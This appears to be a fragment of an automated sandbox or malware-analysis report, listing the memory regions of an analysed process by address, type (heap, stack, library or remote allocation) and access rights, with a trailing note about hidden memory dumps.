page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
4710000
|
heap
|
page read and write
|
||
|
1C40000
|
heap
|
page read and write
|
||
|
40E0000
|
heap
|
page read and write
|
||
|
2FFF000
|
stack
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
1AF4000
|
heap
|
page read and write
|
||
|
430A000
|
heap
|
page read and write
|
||
|
1B640000
|
heap
|
page read and write
|
||
|
1AEEE000
|
stack
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
3FB000
|
heap
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
4E0000
|
trusted library allocation
|
page read and write
|
||
|
1E17000
|
heap
|
page read and write
|
||
|
3D38000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
|
2DA000
|
heap
|
page read and write
|
||
|
1ACD9000
|
stack
|
page read and write
|
||
|
22AE000
|
stack
|
page read and write
|
||
|
2D4000
|
heap
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
37D2000
|
heap
|
page read and write
|
||
|
2916000
|
trusted library allocation
|
page read and write
|
||
|
3D41000
|
heap
|
page read and write
|
||
|
3879000
|
heap
|
page read and write
|
||
|
3EFB000
|
heap
|
page read and write
|
||
|
2652000
|
trusted library allocation
|
page read and write
|
||
|
1F50000
|
direct allocation
|
page read and write
|
||
|
48E000
|
heap
|
page execute and read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
4E9000
|
heap
|
page read and write
|
||
|
4719000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
42C7000
|
heap
|
page read and write
|
||
|
1DF0000
|
heap
|
page read and write
|
||
|
269000
|
heap
|
page read and write
|
||
|
1A6FC000
|
heap
|
page read and write
|
||
|
2844000
|
trusted library allocation
|
page read and write
|
||
|
37E7000
|
heap
|
page read and write
|
||
|
202F000
|
stack
|
page read and write
|
||
|
349000
|
heap
|
page read and write
|
||
|
7FE89A98000
|
trusted library allocation
|
page read and write
|
||
|
3F20000
|
heap
|
page read and write
|
||
|
1A9B0000
|
heap
|
page read and write
|
||
|
1CD3000
|
direct allocation
|
page read and write
|
||
|
1ED0000
|
direct allocation
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
4D8000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
1AA2F000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
1BD000
|
heap
|
page read and write
|
||
|
2365000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
3806000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
3F0B000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
7FE898A0000
|
trusted library allocation
|
page read and write
|
||
|
3EF2000
|
heap
|
page read and write
|
||
|
7FE89A57000
|
trusted library allocation
|
page read and write
|
||
|
395000
|
heap
|
page read and write
|
||
|
2AEB000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
40A0000
|
heap
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
3F16000
|
heap
|
page read and write
|
||
|
1A630000
|
heap
|
page read and write
|
||
|
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
|
2D50000
|
trusted library allocation
|
page read and write
|
||
|
3EEC000
|
heap
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
1C90000
|
direct allocation
|
page read and write
|
||
|
461000
|
heap
|
page read and write
|
||
|
2000000
|
heap
|
page execute and read and write
|
||
|
33D000
|
heap
|
page read and write
|
||
|
3876000
|
heap
|
page read and write
|
||
|
316000
|
heap
|
page read and write
|
||
|
3D6F000
|
heap
|
page read and write
|
||
|
387000
|
heap
|
page read and write
|
||
|
7FE89A30000
|
trusted library allocation
|
page read and write
|
||
|
1C555000
|
heap
|
page read and write
|
||
|
12301000
|
trusted library allocation
|
page read and write
|
||
|
458000
|
heap
|
page execute and read and write
|
||
|
4DE000
|
heap
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
4300000
|
heap
|
page read and write
|
||
|
4A3000
|
heap
|
page read and write
|
||
|
9ED000
|
heap
|
page read and write
|
||
|
1C10000
|
trusted library allocation
|
page read and write
|
||
|
49B000
|
remote allocation
|
page execute and read and write
|
||
|
1C14B000
|
heap
|
page read and write
|
||
|
1C090000
|
heap
|
page read and write
|
||
|
1DC0000
|
trusted library allocation
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
2AF0000
|
trusted library allocation
|
page execute
|
||
|
40A1000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
C0000
|
trusted library allocation
|
page read and write
|
||
|
3DBE000
|
stack
|
page read and write
|
||
|
245F000
|
stack
|
page read and write
|
||
|
1E80000
|
heap
|
page read and write
|
||
|
2D1000
|
heap
|
page read and write
|
||
|
3879000
|
heap
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
2500000
|
trusted library allocation
|
page read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page execute and read and write
|
||
|
2631000
|
trusted library allocation
|
page read and write
|
||
|
1A95E000
|
heap
|
page read and write
|
||
|
31E000
|
heap
|
page read and write
|
||
|
2CD4000
|
heap
|
page read and write
|
||
|
34E000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
323D000
|
trusted library allocation
|
page read and write
|
||
|
2626000
|
trusted library allocation
|
page read and write
|
||
|
2586000
|
trusted library allocation
|
page read and write
|
||
|
3876000
|
heap
|
page read and write
|
||
|
4B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
|
3F22000
|
heap
|
page read and write
|
||
|
3D32000
|
heap
|
page read and write
|
||
|
195000
|
stack
|
page read and write
|
||
|
4F9000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
There are 776 hidden memdumps, click here to show them.